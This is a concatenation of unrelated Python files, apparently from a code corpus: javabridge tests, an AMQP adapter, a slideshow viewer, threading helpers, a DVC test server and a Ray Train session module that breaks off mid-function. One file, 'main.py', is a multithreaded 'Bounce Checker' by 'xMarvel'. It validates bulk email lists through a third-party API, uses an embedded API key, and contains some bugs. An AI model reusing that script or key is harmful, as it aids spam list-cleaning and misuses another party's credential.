c = javabridge.get_class_wrapper("java.lang.Number")
def test_03_03_cw_get_classes(self):
c = javabridge.get_class_wrapper('java.lang.Number')
classes = c.getClasses()
self.assertEqual(len(javabridge.get_env().get_object_array_elements(classes)), 0)
def test_03_04_cw_get_annotation(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotation = c.getAnnotation(javabridge.class_for_name('java.lang.Deprecated'))
self.assertTrue(annotation is not None)
def test_03_05_cw_get_annotations(self):
c = javabridge.get_class_wrapper('java.security.Identity')
annotations = c.getAnnotations()
annotations = javabridge.get_env().get_object_array_elements(annotations)
self.assertEqual(len(annotations), 1)
self.assertTrue(javabridge.to_string(annotations[0]).startswith('@java.lang.Deprecated'))
def test_03_06_cw_get_constructors(self):
c = javabridge.get_class_wrapper('java.lang.String')
constructors = c.getConstructors()
constructors = javabridge.get_env().get_object_array_elements(constructors)
self.assertEqual(len(constructors), 15)
def test_03_07_cw_get_fields(self):
c = javabridge.get_class_wrapper('java.lang.String')
fields = c.getFields()
fields = javabridge.get_env().get_object_array_elements(fields)
self.assertEqual(len(fields), 1)
self.assertEqual(javabridge.call(fields[0], 'getName', '()Ljava/lang/String;'),
"CASE_INSENSITIVE_ORDER")
def test_03_08_cw_get_field(self):
c = javabridge.get_class_wrapper('java.lang.String')
field = c.getField('CASE_INSENSITIVE_ORDER')
modifiers = javabridge.call(field, 'getModifiers', '()I')
static = javabridge.get_static_field('java/lang/reflect/Modifier','STATIC','I')
self.assertEqual((modifiers & static), static)
def test_03_09_cw_get_method(self):
sclass = javabridge.class_for_name('java.lang.String')
iclass = javabridge.get_static_field('java/lang/Integer', 'TYPE',
'Ljava/lang/Class;')
c = javabridge.get_class_wrapper('java.lang.String')
m = c.getMethod('charAt', [ iclass ])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')), 'char')
m = c.getMethod('concat', [ sclass])
self.assertEqual(javabridge.to_string(javabridge.call(m, 'getReturnType', '()Ljava/lang/Class;')),
'class java.lang.String')
def test_03_10_cw_get_methods(self):
c = javabridge.get_class_wrapper('java.lang.String')
mmm = javabridge.get_env().get_object_array_elements(c.getMethods())
self.assertTrue(any([javabridge.call(m, 'getName', '()Ljava/lang/String;') == 'concat'
for m in mmm]))
def test_03_11_cw_get_constructor(self):
c = javabridge.get_class_wrapper('java.lang.String')
sclass = javabridge.class_for_name('java.lang.String')
constructor = c.getConstructor([sclass])
self.assertEqual(javabridge.call(constructor, 'getName', '()Ljava/lang/String;'),
'java.lang.String')
def test_04_01_field_get(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
v = f.get(None)
self.assertEqual(javabridge.to_string(v), '127')
def test_04_02_field_name(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
self.assertEqual(f.getName(), 'MAX_VALUE')
def test_04_03_field_type(self):
c = javabridge.get_class_wrapper('java.lang.Byte')
f = javabridge.get_field_wrapper(c.getField('MAX_VALUE'))
t = f.getType()
self.assertEqual(javabridge.to_string(t), 'byte')
def test_05_01_run_script(self):
self.assertEqual(javabridge.run_script("2+2"), 4)
def test_05_02_run_script_with_inputs(self):
self.assertEqual(javabridge.run_script("a+b", bindings_in={"a":2, "b":3}), 5)
def test_05_03_run_script_with_outputs(self):
outputs = { "result": None}
javabridge.run_script("var result = 2+2;", bindings_out=outputs)
self.assertEqual(outputs["result"], 4)
def test_06_01_execute_asynch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"))
def test_06_02_execute_synch_main(self):
javabridge.execute_runnable_in_main_thread(javabridge.run_script(
"new java.lang.Runnable() { run:function() {}};"), True)
def test_06_03_future_main(self):
c = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
result = javabridge.execute_future_in_main_thread(
javabridge.make_future_task(c, fn_post_process=javabridge.unwrap_javascript))
self.assertEqual(result, 4)
def test_07_01_wrap_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
self.assertFalse(wfuture.isDone())
self.assertFalse(wfuture.isCancelled())
wfuture.run()
self.assertTrue(wfuture.isDone())
self.assertEqual(wfuture.get(), 4)
def test_07_02_cancel_future(self):
future = javabridge.run_script("""
new java.util.concurrent.FutureTask(
new java.util.concurrent.Callable() {
call: function() { return 2+2; }});""")
wfuture = javabridge.get_future_wrapper(
future, fn_post_process=javabridge.unwrap_javascript)
wfuture.cancel(True)
self.assertTrue(wfuture.isCancelled())
self.assertRaises(javabridge.JavaException, wfuture.get)
def test_07_03_make_future_task_from_runnable(self):
future = javabridge.make_future_task(
javabridge.run_script("new java.lang.Runnable() { run: function() {}};"),
11)
future.run()
self.assertEqual(javabridge.call(future.get(), "intValue", "()I"), 11)
def test_07_04_make_future_task_from_callable(self):
call_able = javabridge.run_script("""
new java.util.concurrent.Callable() {
call: function() { return 2+2; }};""")
future = javabridge.make_future_task(
call_able, fn_post_process=javabridge.unwrap_javascript)
future.run()
self.assertEqual(future.get(), 4)
def test_08_01_wrap_collection(self):
c = javabridge.make_instance("java/util/HashSet", "()V")
w = javabridge.get_collection_wrapper(c)
self.assertFalse(hasattr(w, "addI"))
self.assertEqual(w.size(), 0)
self.assertEqual(len(w), 0)
self.assertTrue(w.isEmpty())
def test_08_02_add(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
self.assertTrue(c.add("Foo"))
self.assertEqual(len(c), 1)
self.assertFalse(c.isEmpty())
def test_08_03_contains(self):
c = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c.add("Foo")
self.assertTrue(c.contains("Foo"))
self.assertFalse(c.contains("Bar"))
self.assertIn("Foo", c)
self.assertNotIn("Bar", c)
def test_08_04_addAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2.addAll(c1.o)
self.assertIn("Foo", c2)
def test_08_05__add__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c3 = c1 + c2
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c3)
c4 = c3 + ["Hello", "World"]
self.assertIn("Hello", c4)
self.assertIn("World", c4)
def test_08_06__iadd__(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
c2 += c1
for k in ("Foo", "Bar", "Baz"):
self.assertIn(k, c2)
c2 += ["Hello", "World"]
self.assertIn("Hello", c2)
self.assertIn("World", c2)
def test_08_07_contains_all(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Baz")
self.assertFalse(c2.containsAll(c1.o))
c2 += c1
self.assertTrue(c2.containsAll(c1.o))
def test_08_08_remove(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c1.remove("Foo")
self.assertNotIn("Foo", c1)
def test_08_09_removeAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.removeAll(c2)
self.assertNotIn("Foo", c1)
def test_08_10_retainAll(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
c2 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c2.add("Foo")
c1.retainAll(c2)
self.assertIn("Foo", c1)
self.assertNotIn("Bar", c1)
def test_08_11_toArray(self):
c1 = javabridge.get_collection_wrapper(javabridge.make_instance("java/util/HashSet", "()V"))
c1.add("Foo")
c1.add("Bar")
result = [javabridge.to_string(x) for x in c1.toArray()]
self.assertIn("Foo", result)
self.assertIn("Bar", result)
def test_08_12_make_list(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertSequenceEqual(l, ["Foo", "Bar"])
self.assertTrue(hasattr(l, "addI"))
def test_08_13_addI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addI(1, "Baz")
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_14_addAllI(self):
l = javabridge.make_list(["Foo", "Bar"])
l.addAllI(1, javabridge.make_list(["Baz"]))
self.assertSequenceEqual(l, ["Foo", "Baz", "Bar"])
def test_08_15_indexOf(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.indexOf("Bar"), 1)
self.assertEqual(l.lastIndexOf("Foo"), 0)
def test_08_16_get(self):
l = javabridge.make_list(["Foo", "Bar"])
self.assertEqual(l.get(1), "Bar")
def test_08_17_set(self):
l = javabridge.make_list(["Foo", "Bar"])
l.set(1, "Baz")
self.assertEqual(l.get(1), "Baz")
def test_08_18_subList(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertSequenceEqual(l.subList(1, 3), ["Bar", "Baz"])
def test_08_19__getitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz", "Hello", "World"])
self.assertEqual(l[1], "Bar")
self.assertEqual(l[-2], "Hello")
self.assertSequenceEqual(l[1:3], ["Bar", "Baz"])
self.assertSequenceEqual(l[::3], ["Foo", "Hello"])
def test_08_20__setitem__(self):
l = javabridge.make_list(["Foo", "Bar"])
l[1] = "Baz"
self.assertEqual(l.get(1), "Baz")
def test_08_21__delitem__(self):
l = javabridge.make_list(["Foo", "Bar", "Baz"])
del l[1]
self.assertSequenceEqual(l, ["Foo", "Baz"])
def test_09_01_00_get_field(self):
o = javabridge.make_instance("org/cellprofiler/javabridge/test/RealRect", "(DDDD)V", 1, 2, 3, 4)
self.assertEqual(javabridge.get_field(o, "x", "D"), 1)
def test_09_02_get_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
javabridge.get_field(o, "NoSuchField", "I")
self.assertRaises(javabridge.JavaException, fn)
def test_09_03_set_field(self):
class_name = "org/cellprofiler/javabridge/test/RealRect"
o = javabridge.make_instance(class_name, "()V")
test_cases = (
("f_char", "C", "A"),
("f_byte", "B", 3),
("f_short", "S", 15),
("f_int", "I", 392),
("f_long", "J", -14),
("f_float", "F", 1.03),
("f_double", "D", -889.1),
("f_object", "Ljava/lang/Object;",
javabridge.make_instance("java/lang/Integer", "(I)V", 15)),
("f_object", "Ljava/lang/Object;", None))
for field_name, signature, value in test_cases:
javabridge.set_field(o, field_name, signature, value)
v = javabridge.get_field(o, field_name, signature)
if isinstance(value, float):
self.assertAlmostEqual(v, value)
elif isinstance(value, javabridge.JB_Object):
self.assertTrue(javabridge.call(
value, "equals", "(Ljava/lang/Object;)Z", v))
else:
self.assertEqual(v, value)
def test_09_04_set_field_no_such_field(self):
def fn():
o = javabridge.make_instance("java/lang/Object", "()V")
javabridge.set_field(o, "NoSuchField", "I", 1)
self.assertRaises(javabridge.JavaException, fn)
def test_10_01_iterate_java_on_non_iterator(self):
#
# Regression test of issue #11: the expression below segfaulted
#
def fn():
list(javabridge.iterate_java(javabridge.make_list(range(10)).o))
self.assertRaises(javabridge.JavaError, fn)
def test_10_01_class_path(self):
for arg in ['-cp', '-classpath', '-Djava.class.path=foo']:
self.assertRaises(ValueError, lambda: javabridge.start_vm([arg]))
def test_11_01_make_run_dictionary(self):
from javabridge.jutil import make_run_dictionary
o = javabridge.make_instance("java/util/Hashtable", "()V")
a = javabridge.make_instance("java/util/ArrayList", "()V")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"foo", "bar")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"baz", a)
d = make_run_dictionary(o)
self.assertIn("foo", d)
self.assertEqual(d["foo"], "bar")
self.assertIn("baz", d)
self.assertTrue(javabridge.call(d["baz"], "equals",
"(Ljava/lang/Object;)Z", a))
def test_12_01_jref(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
alt = javabridge.redeem_jref(ref_id)
o["bar"] = "bunny"
for key in o:
self.assertTrue(key in alt)
self.assertEqual(o[key], alt[key])
def test_12_02_jref_lost(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
del ref
self.assertRaises(KeyError, javabridge.redeem_jref, ref_id)
def test_12_03_jref_create_and_lock(self):
cpython = javabridge.JClassWrapper(
'org.cellprofiler.javabridge.CPython')()
d = javabridge.JClassWrapper('java.util.Hashtable')()
result = javabridge.JClassWrapper('java.util.ArrayList')()
d.put("result", result)
ref_self = javabridge.create_and_lock_jref(self)
d.put("self", ref_self)
cpython.execute(
'import javabridge\n'
'x = { "foo":"bar"}\n'
'ref_id = javabridge.create_and_lock_jref(x)\n'
'javabridge.JWrapper(result).add(ref_id)', d, d)
cpython.execute(
'import javabridge\n'
'ref_id = javabridge.JWrapper(result).get(0)\n'
'self = javabridge.redeem_jref(javabridge.to_string(self))\n'
'self.assertEqual(javabridge.redeem_jref(ref_id)["foo"], "bar")\n'
'javabridge.unlock_jref(ref_id)', d, d)
javabridge.unlock_jref(ref_self)
self.assertRaises(KeyError, javabridge.redeem_jref, ref_self)
def test_13_01_unicode_arg(self):
# On 2.x, check that a unicode argument is properly prepared
s = u"Hola ni\u00F1os"
s1, s2 = s.split(" ")
if sys.version_info.major == 2:
s2 = s2.encode("utf-8")
env = javabridge.get_env()
js1 = env.new_string(s1+" ")
result = javabridge.call(
js1, "concat", "(Ljava/lang/String;)Ljava/lang/String;", s2)
self.assertEqual(s, result)
if __name__=="__main__":
unittest.main()
|
AmqpAdapter.py
|
import pika
import threading
class AmqpAdapter:
def __init__(self, name, controller):
self.sub_connection = None
self.sub_channel = None
self.pub_connection = None
self.pub_channel = None
self.name = name
self.controller = controller
self.properties = {}
async def connect(self, address):
self.sub_connection = pika.BlockingConnection(pika.ConnectionParameters(address))
self.sub_channel = self.sub_connection.channel()
self.pub_connection = pika.BlockingConnection(pika.ConnectionParameters(address))
self.pub_channel = self.pub_connection.channel()
async def subscribe(self, topic, qos=None):
self.sub_channel.queue_declare(topic)
self.sub_channel.basic_consume(queue=topic, auto_ack=True, on_message_callback=self.callback)
print("subscribed to " + topic)
async def publish(self, topic, identifier, payload, settings):
prop = self.properties.get(topic)
if prop is None:
self.properties[topic] = pika.BasicProperties(reply_to=topic)
prop = self.properties[topic]
self.pub_channel.basic_publish(exchange='', routing_key=topic, body=str(identifier + payload), properties=prop)
async def start_client(self):
thread = threading.Thread(target=self.looping)
thread.start()
async def stop_client(self):
try:
self.sub_channel.stop_consuming()
self.sub_connection.close()
self.pub_connection.close()
except:
print("Client disconnected")
# Topicname wird aus Nachrichteninhalt übergeben
def callback(self, ch, method, properties, body):
topic = properties.reply_to
self.controller.react(topic, body.decode("utf-8"))
def looping(self):
try:
self.sub_channel.start_consuming()
except:
print("Connection closed")
|
snippet.py
|
#!/usr/bin/env python
"""
If you use landslide to create slideshows using markdown, you may have found
yourself repeating endlessly:
+ save source document
+ switch to the terminal to run landslide
+ reload the generated html in your browser
This QT (using webkit) based "application" monitor changes to the source file
and automatically regenerates the HTML and refreshes the "browser".
$ ./qtkit.py --help
usage: qtkit.py [-h] --landslide LANDSLIDE [--port PORT] [--html HTML] file
landslide text to html viewer
positional arguments:
file text file (md or rst)
optional arguments:
-h, --help show this help message and exit
--landslide LANDSLIDE
path to the landslide binary
--port PORT simple http server port (default 8000)
--html HTML html filename (default presentation.html)
To quit close the QT window or press ctrl + c in the terminal.
"""
import sys
import os
import signal
import subprocess
import SimpleHTTPServer
import SocketServer
from multiprocessing import Process
import argparse
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class FullHelpArgumentParser(argparse.ArgumentParser):
""" argument parser displaying the complete help on error """
# http://stackoverflow.com/a/4042861/753565
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
def parse_arguments():
""" argparse wrapper """
parser = FullHelpArgumentParser(description='landslide text to html viewer')
parser.add_argument('file', help='text file (md or rst)', action='store')
parser.add_argument('--landslide', help='path to the landslide binary',
action='store', required=True)
parser.add_argument('--port', type=int, help='simple http server port (default 8000)',
default=8000, action='store')
parser.add_argument('--html', help='html filename (default presentation.html)',
default='presentation.html', action='store')
return parser.parse_args()
def http_server(path, port):
""" start a simple http server listening on port serving files from path """
os.chdir(path)
handler = SimpleHTTPServer.SimpleHTTPRequestHandler
# http://stackoverflow.com/questions/337115/setting-time-wait-tcp
SocketServer.TCPServer.allow_reuse_address = True
http = SocketServer.TCPServer(('', port), handler)
# handling a ctrl-c termination
try:
http.serve_forever()
except KeyboardInterrupt:
pass
def landslide(args):
""" run args.landslide on args.file to create args.html """
html_file = os.path.join(os.path.dirname(args.file), args.html)
subprocess.call([args.landslide, '--embed', args.file, '-d', html_file])
def start_fs_watcher(web, args):
""" create a watcher on args.file, calling landslide and reloading web """
# http://stackoverflow.com/a/5339877/753565
@pyqtSlot(str)
def file_changed(path):
landslide(args)
web.reload()
fs_watcher = QFileSystemWatcher([args.file])
fs_watcher.connect(fs_watcher, SIGNAL('fileChanged(QString)'), file_changed)
return fs_watcher
def main():
args = parse_arguments()
# using multiprocessing to start the http server in its own process
http = Process(target=http_server, args=(os.path.dirname(args.file), args.port))
http.start()
app = QApplication([])
web = QWebView()
fs_watcher = start_fs_watcher(web, args)
# compare html and text file last modified dates to only process if necessary
mtime_text_file = os.path.getmtime(args.file)
try:
mtime_html_file = os.path.getmtime(os.path.join(os.path.dirname(args.file), args.html))
except OSError:
mtime_html_file = 0
if mtime_text_file > mtime_html_file:
landslide(args)
web.load(QUrl('http://localhost:%i/%s' % (args.port, args.html)))
web.show()
# exiting from the command line (ctrl+c)
signal.signal(signal.SIGINT, signal.SIG_DFL)
# starting the QT event loop
app.exec_()
# del fs_watcher in a cleanup slot connected to the aboutToQuit signal doesn't work
del fs_watcher
http.terminate()
if __name__ == '__main__':
main()
|
threading-demo.py
|
import queue
import threading
import time
def putting_thread(q):
while True:
print('started thread')
time.sleep(10)
q.put(5)
print('put something')
q = queue.Queue()
t = threading.Thread(target=putting_thread, args=(q,), daemon=True)
t.start()
q.put(5)
print(q.get())
print('first item gotten')
print(q.get())
print('finished')
|
main.py
|
#============== Moudles ===============#
import requests
from licensing.models import *
from licensing.methods import Key, Helpers
from colorama import Fore, Style, Back
from multiprocessing.dummy import Pool
import multiprocessing, time, datetime, ctypes
import re
import sys
import random
import time
import os
import threading
import queue, time
import urllib3, urllib
from datetime import datetime
from licensing.models import *
from licensing.methods import Key, Helpers
import requests, re, sys, random, os
from colorama import Fore, Back, init
from colorama.initialise import init
import timeit
from threading import Thread
count = len(open('list.txt').readlines( ))
countlive = 0
countdd = 0
countall2 = 0
countrec = 0
init(autoreset=True)
from random import choice
init()
class bounce():
countlive = 0
countdd = 0
countall2 = 0
countrec = 0
ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'
live = '"Status":"Valid"'.encode()
die = '"Status":"Invalid"'.encode()
inputQueue = queue.Queue()
def __init__(self):
def slowprint(s):
for c in s + '\n':
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(1. / 10)
def logo():
fg = [
'\033[91;1m', # RED 0
'\033[92;1m', # GREEN 1
'\033[93;1m', # YELLOW 2
'\033[94;1m', # BLUE 3
'\033[95;1m', # MAGENTA 4
'\033[96;1m', # CYAN 5
'\033[97;1m' # WHITE 6
]
os.system('cls')
print('''
{2} ┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
{2} ┃ {0}▄ █▀▄▀█ ██ █▄▄▄▄ ▄ ▄███▄ █ {2}┃
{2} ┃ {0}▀▄ █ █ █ █ █ █ █ ▄▀ █ █▀ ▀ █ {2}┃
{2} ┃ {0}█ ▀ █ ▄ █ █▄▄█ █▀▀▌ █ █ ██▄▄ █ {2}┃
{2} ┃ {0}▄ █ █ █ █ █ █ █ █ █ █▄ ▄▀ ███▄ {2}┃
{2} ┃ {0}█ ▀▄ █ █ █ █ █ ▀███▀ ▀ {2}┃
{2} ┃ {0}▀ ▀ █ ▀ █▐ {2}┃
{2} ┃ {0}▀ ▐ {2}┃
{2} ┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
{2} ┃ {0}Bounce Checker v2.0 {2}┃ {0}CODED BY xMarvel {2}┃
{2} ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
'''.format(fg[0], fg[1], fg[5], fg[4]))
logo()
bl = Fore.BLACK
wh = Fore.WHITE
yl = Fore.YELLOW
red = Fore.RED
gr = Fore.GREEN
ble = Fore.BLUE
res = Style.RESET_ALL
init(autoreset=True)
self.mailist = input(f'{gr} Give Me Your List{wh}/{red}root> {gr}${res} ')
self.thread = '50'
self.countList = len(list(open(self.mailist)))
self.clean = 'n'
if self.clean == 'y':
self.clean_rezult()
print('')
def save_to_file(self, nameFile, x):
kl = open(nameFile, 'a+')
kl.write(x)
kl.close()
def clean_rezult(self):
open('live.txt', 'w').close()
open('die.txt', 'w').close()
open('unknown.txt', 'w').close()
def post_email(self, eml):
try:
r = requests.get('https://verify.gmass.co/verify?email='+eml+'&key=52d5d6dd-cd2b-4e5a-a76a-1667aea3a6fc',
headers={'User-Agent': self.ua}
)
if self.live in r.content:
return 'live'
else:
return 'die'
except:
return 'unknown'
def chk(self):
while 1:
global countall2
global countdd
global countlive
global countrec
eml = self.inputQueue.get()
rez = self.post_email(eml)
if rez == 'die':
countall2 += 1
countdd += 1
print(Fore.CYAN + f'[Bounce Checker 2.0]' + Fore.WHITE + ' | ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + Fore.RED + f" | {eml} | Die [ [ {countlive}/{count} ]")
ctypes.windll.kernel32.SetConsoleTitleW(f"[Bounce Checker 2.0] [ @xMarvel_OFFiCiAL] {countall2}/{count} | Live : {countlive} Recheck :{countrec} | Die : {countdd}")
self.save_to_file('die.txt', eml+'\n')
elif rez == 'live':
countall2 += 1
countlive += 1
print(Fore.CYAN + f'[Bounce Checker 2.0]' + Fore.WHITE + ' | ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + Fore.GREEN + f" | {eml} | live [ [ {countlive}/{count} ]")
ctypes.windll.kernel32.SetConsoleTitleW(f"[Bounce Checker 2.0] {countall2}/{count} | Live : {countlive} Recheck :{countrec} | Die : {countdd}")
self.save_to_file('live.txt', eml+'\n')
elif rez == 'unknown':
countall2 += 1
countdd += 1
print(Fore.CYAN + '[Bounce Checker 2.0]' + Fore.WHITE + ' | ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + Fore.RED + f" | {eml} | die [ {countdd}/{count} ]")
self.save_to_file('die.txt', eml+'\n')
else:
print('contact @xMarval_support')
self.inputQueue.task_done()
def run_thread(self):
for x in range(int(self.thread)):
t = threading.Thread(target=self.chk)
t.setDaemon(True)
t.start()
for y in open(self.mailist, 'r').readlines():
self.inputQueue.put(y.strip())
self.inputQueue.join()
def finish(self):
print('')
print('Checking', self.countList, 'emails has been Checked by xMarvel Checker')
print('')
print('Live Emails : ', len(list(open('live.txt'))), 'emails')
print('Die Emails : ', len(list(open('die.txt'))), 'emails')
print('')
input('Enter To Exit --> ')
heh = bounce()
heh.run_thread()
heh.finish()
|
async_thread.py
|
"""Tools for working with async tasks
"""
import asyncio
import logging
import threading
from . import EOS_MARKER
log = logging.getLogger(__name__)
class AsyncThread(object):
@staticmethod
def _worker(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def __init__(self):
self._loop = asyncio.new_event_loop()
self._thread = threading.Thread(target=AsyncThread._worker, args=(self._loop,))
self._thread.start()
def terminate(self):
def _stop(loop):
loop.stop()
if self._loop is None:
return
self.call_soon(_stop, self._loop)
self._thread.join()
self._loop, self._thread = None, None
def __del__(self):
self.terminate()
def submit(self, func, *args, **kwargs):
"""Run async func with args/kwargs in separate thread, returns Future object."""
return asyncio.run_coroutine_threadsafe(func(*args, **kwargs), self._loop)
def call_soon(self, func, *args):
"""Call normal (non-async) function with arguments in the processing thread
it's just a wrapper over `loop.call_soon_threadsafe()`
Returns a handle with `.cancel`, not a full on Future
"""
return self._loop.call_soon_threadsafe(func, *args)
@property
def loop(self):
return self._loop
def from_queue(self, q, eos_marker=EOS_MARKER):
"""Convert qsync queue to a sync iterator,
yield items from async queue until eos_marker is observed
Queue's loop have to be the same as self.loop
"""
async def drain_q(q):
def get(q):
x = q.get_nowait()
q.task_done()
return x
return [get(q) for _ in range(q.qsize())]
while True:
xx = self.submit(drain_q, q).result()
for x in xx:
if x is eos_marker:
return
yield x
|
httpd.py
|
import hashlib
import os
import threading
from RangeHTTPServer import RangeRequestHandler
from dvc.utils.compat import HTTPServer
class TestRequestHandler(RangeRequestHandler):
checksum_header = None
def end_headers(self):
# RangeRequestHandler only sends Accept-Ranges header if Range header
# is present, see https://github.com/danvk/RangeHTTPServer/issues/23
if not self.headers.get("Range"):
self.send_header("Accept-Ranges", "bytes")
# Add a checksum header
if self.checksum_header:
file = self.translate_path(self.path)
if not os.path.isdir(file) and os.path.exists(file):
with open(file, "r") as fd:
encoded_text = fd.read().encode("utf8")
checksum = hashlib.md5(encoded_text).hexdigest()
self.send_header(self.checksum_header, checksum)
RangeRequestHandler.end_headers(self)
class ETagHandler(TestRequestHandler):
checksum_header = "ETag"
class ContentMD5Handler(TestRequestHandler):
checksum_header = "Content-MD5"
class StaticFileServer:
_lock = threading.Lock()
def __init__(self, handler="etag"):
self._lock.acquire()
handler_class = ETagHandler if handler == "etag" else ContentMD5Handler
self._httpd = HTTPServer(("localhost", 0), handler_class)
self._thread = None
def __enter__(self):
self._thread = threading.Thread(target=self._httpd.serve_forever)
self._thread.daemon = True
self._thread.start()
return self._httpd
def __exit__(self, *args):
self._httpd.socket.close()
self._httpd.shutdown()
self._httpd.server_close()
self._lock.release()
|
session.py
|
import os
import platform
import queue
import threading
import time
from datetime import datetime
from enum import Enum, auto
from typing import Callable
from typing import Optional, Dict
import warnings
import ray
from ray.train.constants import (
DETAILED_AUTOFILLED_KEYS, TIME_THIS_ITER_S, PID, TIMESTAMP, TIME_TOTAL_S,
NODE_IP, TRAINING_ITERATION, HOSTNAME, DATE, RESULT_FETCH_TIMEOUT)
from ray.train.utils import PropagatingThread, RayDataset
class TrainingResultType(Enum):
REPORT = auto()
CHECKPOINT = auto()
class TrainingResult():
def __init__(self, type: TrainingResultType, data: Dict):
self.type = type
self.data = data
class Session:
"""Holds information for training on each worker."""
def __init__(self,
training_func: Callable,
world_rank: int,
local_rank: int,
dataset_shard: Optional[RayDataset] = None,
checkpoint: Optional[Dict] = None,
detailed_autofilled_metrics: bool = False):
self.dataset_shard = dataset_shard
# The Thread object that is running the training function.
self.training_thread = PropagatingThread(
target=training_func, daemon=True)
self.world_rank = world_rank
self.local_rank = local_rank
self.loaded_checkpoint = checkpoint
# This lock is used to control the execution of the training thread.
self.continue_lock = threading.Semaphore(0)
# Queue for sending results across threads.
self.result_queue = queue.Queue(1)
# Autofilled metrics attributes.
self.detailed_autofilled_metrics = detailed_autofilled_metrics
self.last_report_time = time.time()
self.iteration = 0
self.time_total = 0.0
self.local_ip = self.get_current_ip()
self.ignore_report = False
self.training_started = False
def get_current_ip(self):
self.local_ip = ray.util.get_node_ip_address()
return self.local_ip
def start(self):
"""Starts the training thread."""
self.training_started = True
self.training_thread.start()
def pause_reporting(self):
"""Ignore all future ``train.report()`` calls."""
self.ignore_report = True
def finish(self):
"""Finishes the training thread.
Either returns the output from training or raises any Exception from
training.
"""
# Wait for training to finish.
# This will raise any errors that occur during training, including
# SystemError
func_output = self.training_thread.join()
# If training finished successfully, then return results.
return func_output
def get_next(self) -> Optional[TrainingResult]:
"""Gets next result from the queue."""
if not self.training_started:
raise RuntimeError("Please call start before calling get_next.")
result = None
# While training is still ongoing, attempt to get the result.
while result is None and self.training_thread.is_alive():
try:
result = self.result_queue.get(
block=True, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# If no result was found, then the runner must no longer be alive.
if result is None:
# Try one last time to fetch results in case results were
# reported in between the time of the last check and the
# termination of the thread runner.
try:
result = self.result_queue.get(
block=False, timeout=RESULT_FETCH_TIMEOUT)
except queue.Empty:
pass
# Release the lock to trigger training to continue.
self.continue_lock.release()
# Return None if there are no more results to fetch.
return result
def _auto_fill_metrics(self, result: dict) -> dict:
"""Add autofilled metrics and update attributes."""
current_time = time.time()
current_datetime = datetime.now()
if TIME_THIS_ITER_S in result:
time_this_iter = result[TIME_THIS_ITER_S]
else:
